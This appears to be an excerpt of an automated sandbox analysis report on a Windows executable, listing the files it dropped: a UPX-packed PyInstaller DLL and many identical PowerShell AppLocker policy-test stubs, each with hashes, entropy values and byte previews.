                                                                                                                                                                                                                              SHA-512:BD567A4C6B4627556B02F4299D1B8A9AA7AFFAE0AAFBE5A10C92C7E5A08E7F8CBDA497F27C01D1FF4352FF1DC1C2FE3C79FF9484E58E6357C96C9A064F5011EA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J0...Q{Y.Q{Y.Q{Y.).Y.Q{Y.*zX.Q{Y.*~X.Q{Y.*.X.Q{Y.*xX.Q{YE)zX.Q{Y.QzY.Q{Y.*sX.Q{Y.*{X.Q{Y.*.Y.Q{Y.*yX.Q{YRich.Q{Y................PE..L...I.Vc...........!...!.p...0.......).......@...............................p............@..........................J..L"...H..L....@.......................m.. ...................................X5..............................................UPX0....................................UPX1.....p.......h..................@....rsrc....0...@.......l..............@..............................................................................................................................................................................................................................................................................................................................................................................4.02.UPX!....

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI73202\unicodedata.pyd

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\KpHYfxnJs6.exe
                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):298368
                                                                                                                                                                                                                              Entropy (8bit):7.989961859924653
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6144:Qi0QmEFlLL6ZSsgx3sVCp05YYwYdvdvmHw+c5qfzZoSwt:QiMEFlfsK3skpZnmdvMyA7ZoSwt
                                                                                                                                                                                                                              MD5:BB3D050B8A75F478E4B29897EAE427B0
                                                                                                                                                                                                                              SHA1:1930808A59A8FD9C57ED6039E7614697B4CB03D9
                                                                                                                                                                                                                              SHA-256:06AF11548B8A58FED50AE7DBE2FCFBBF04B890926E0FFFD70EED02AECC0D97C6
                                                                                                                                                                                                                              SHA-512:BE596E2829C6978D7F138F79059172024EE73CD3E1F3D7A24AACA4B0D85A2302E2060E6CEBD54854E7F08ED66B665429D38BB22C512DD82533D8BA87A426F515
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........i"...q...q...q..q...q...p...q...p...q...p...q...p...q...p...q...p...q...q..q...p...q...p...q...q...q...p...qRich...q........PE..L...*.Vc...........!...!.`..........@f... ................................................@.........................l...X...................................... ....................................r..............................................UPX0....................................UPX1.....`... ...T..................@....rsrc................X..............@..............................................................................................................................................................................................................................................................................................................................................................................4.02.UPX!....

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0za23e4t.0ko.psm1

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_11h3adb1.ghp.psm1

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_14gt4ibn.fek.psm1

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2jlgnizf.bbx.ps1

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3rpey5vc.yaa.ps1

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4jcyugct.kmi.ps1

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b3x30rro.les.ps1

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cegatykr.jnz.ps1

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d4wfoo0h.o0e.psm1

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fcvxcfm2.aeu.ps1

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hpbke2tq.pj0.psm1

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_injy0u4n.ogt.psm1

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ioft1wew.f44.ps1

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_luearpiw.i2j.ps1

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n1mhq5lj.n0r.ps1

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n3ctgo5z.3kf.psm1

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o04klq4t.zjt.psm1

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_po2xfk3g.kbr.psm1

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pysfggxx.23l.ps1

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qk2bd4sy.xec.ps1

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tab0naee.d44.psm1

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
